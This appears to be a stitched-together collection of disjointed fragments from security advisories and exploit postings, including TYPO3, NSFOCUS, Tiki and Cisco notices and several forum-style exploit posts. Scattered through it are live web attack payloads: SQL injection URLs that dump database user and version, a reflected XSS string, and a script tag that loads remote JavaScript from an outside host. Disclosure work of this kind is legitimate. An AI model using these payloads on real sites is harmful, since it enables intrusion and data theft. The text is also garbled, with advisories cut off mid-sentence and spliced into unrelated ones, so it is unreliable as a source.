Security Team
=== Problem Description ===
Because the default value of the TYPO3 configuration variable fileDenyPattern is not sufficiently secure, TYPO3 is susceptible to the following vulnerabilities when running on the Apache web server:
1. Authenticated backend users with granted access to an arbitrary filemount are able to upload Apache configuration files (.htaccess). A malicious backend user may abuse this to create and execute files containing arbitrary code.
2. If the Apache module mod_mime is enabled on the Apache web server (default case), authenticated backend users with granted access to an arbitrary filemount can upload/create and execute arbitrary files with PHP code. The same applies to frontend users in the case that TYPO3 extensions with frontend plugins rely on t3lib_div::verifyFilenameAgainstDenyPattern() to check the validity of the file name. The TYPO3 security team is aware of a number of popular TYPO3 extensions that use this method. Besides that, TYPO3 extensions that process file uploads using the method processFiles() of the core library fe_adminLib.inc would also be vulnerable. The TYPO3 Security Team is not aware of an existing TYPO3 extension within the TYPO3 extension repository (TER) that uses the method processFiles().
=== Solution ===
Update to TYPO3 version 4.1.7 or 4.2.1, which fix the issues described. The new versions contain an updated default value for fileDenyPattern. If this default value is not used, a warning is displayed in the backend module "About modules" to remind the administrator to change the value of fileDenyPattern.
If you can't update directly, change the value of the configuration variable fileDenyPattern to the following value:
Microsoft Windows Server 2008 SP2
Impact:
======
NSFOCUS Security Team discovered a remote DoS vulnerability in the Microsoft
Windows kernel. A carefully crafted PE file might crash the operating system.
Description:
==========
UiTV UiPlayer UiCheck.dll 1.0.0.7
Impact:
======
NSFOCUS Security Team discovered a stack buffer overflow vulnerability in
UiPlayer which allows remote attackers to run arbitrary code on the user's
system by crafting a malicious webpage.
Description:
==========
Microsoft Internet Explorer 8
Impact:
======
NSFOCUS Security Team discovered a security vulnerability in Microsoft
Internet Explorer. This flaw could be used to corrupt memory resulting in
application crash and possible code execution by convincing users to open
specially crafted HTML files.
IBM DB2 Universal Database v8.1 Fixpak 18
Impact:
======
NSFOCUS Security Team discovered a remote DoS vulnerability in IBM DB2:
sending carefully crafted data to the IBM DB2 JDBC Applet Server causes the
server to exit due to an out-of-bounds access.
Description:
==========
Services Management protocol (WS-Management). It is installed and
running by default. It is used in the VMware Management Service
Console and in ESXi.
The openwsman 2.0.0 management service on ESX 3.5 and ESXi 3.5 is
vulnerable to the following issue found by the SuSE Security-Team:
- Two remote buffer overflows while decoding the HTTP basic
authentication header
This vulnerability could potentially be exploited by users without
[Credits]
Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br
[Greetz]
Crash and all Dclabs members.
Summary
=========
NSFOCUS Security Team discovered a remote buffer overflow vulnerability in
Cisco Security Agent for Windows which allows remote code execution by sending
a malicious SMB request.
Description
============
====================
Disclosure Timeline
====================
02-Nov-2011 - informed Security Team (security@tikiwiki.org)
03-Nov-2011 - feedback from vendor
11-Nov-2011 - release of version 8.1 (End-of-Life for Tiki 7.x)
========
Credits
# #
# class : remote #
# #
# E-mail: cseye_ut@yahoo.com #
# #
# greetz: C.S.Eye Security Team members #
# #
# We Are: Alieye , Z0d14c , Bully13 , Stanly , Safety & All Iranian Hackers #
# #
# Site : www.gcmt.vcp.ir , blog : www.cseye.blogfa.com #
#####################################################################################
[Greetz]
DcLabs Security Research Group.
--
Rodrigo Escobar (ipax)
Pentester/Researcher Security Team @ DcLabs
http://www.dclabs.com.br
Joomla! Security Team has confirmed that this issue will not be fixed.
>> While noted, your exploit report does not fall within the JSST remit as
>> we no longer support J1.0.x branch (as you are aware and indicate).
>> The vulnerability mentioned is not known to exist in any current supported release.
>> Please ensure you are using the latest version of Joomla!
The advisory has been updated with vendor's response:
#
www.site.com/news.php?id=-999/**/union/**/select/**/1,concat_ws(CHAR(32,58,32),user(),database(),version()),3,4,5,6--
#
####################################
#TNX:
#Aria-Security Team (Persian Security Network),hadihadi(Virangar Security Team),
Ajax Security Team
*****************************************
######VULN IN HERE##################
/content.asp?Catid=247&ContentType=<script>alert(/0/)</script>
####################################
#TNX:
#Ajax Security Team,Aria-Security Team (Persian Security Network),hadihadi & black.shadowes(Virangar Security Team)
*****************************************
###################################
#Admin Page:
#http://www.Site.com/admin
###################################
#TNX:
#Aria-Security Team (Persian Security Network),Virangar Security Team
*****************************************
-------------------
Credit
-----------------------
This bug was discovered by Tavis Ormandy and Julien Tinnes of the Google
Security Team.
#<script src=http://md-r00t.persiangig.com/xpl/XSS.JS></script>
#-------------
#http://www.Site.com/links.php?cat_id=28&cat_name=[Xss]
###################################
#TNX:
#Aria-Security Team (Persian Security Network),Virangar Security Team
*****************************************
====================
Disclosure Timeline
====================
16-Nov-2011 - informed Security Team (security@tikiwiki.org)
19-Dec-2011 - fixed by vendor
========
Credits
========
Affected: 2007.0, 2007.1, Corporate 4.0
_______________________________________________________________________
Problem Description:
Sebastian Krahmer of the SUSE Security Team discovered an off-by-one
buffer overflow within rsync. It is not clear if this problem is
exploitable, however updates are available to correct the issue.
_______________________________________________________________________
References:
#Example:
#
http://www.Site.com/index.php?page=headline&id=195 and 1=2 Union select1,2,concat(user(),char(58,58,58),version()),4
###################################
#TNX:
#Aria-Security Team (Persian Security Network),Virangar Security Team
*****************************************
#Example:
#
#http://www.Site.com/[page]/product_info.php?products_id=-999+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,concat(version(),0x3a,0x3e,user()),17,18,19--
###################################
#TNX:
#Aria-Security Team (Persian Security Network),Virangar Security Team
*****************************************
>
--
Scott Nielsen
USU IT Security Team
(435) 797-1804
========
Credits:
========
Vulnerabilities found and advisory written by INFOSERVE Security Team
===========
References:
===========
========
Credits:
========
Vulnerabilities found and advisory written by Stefan Schurtz (KORAMIS Security Team).
===========
References:
===========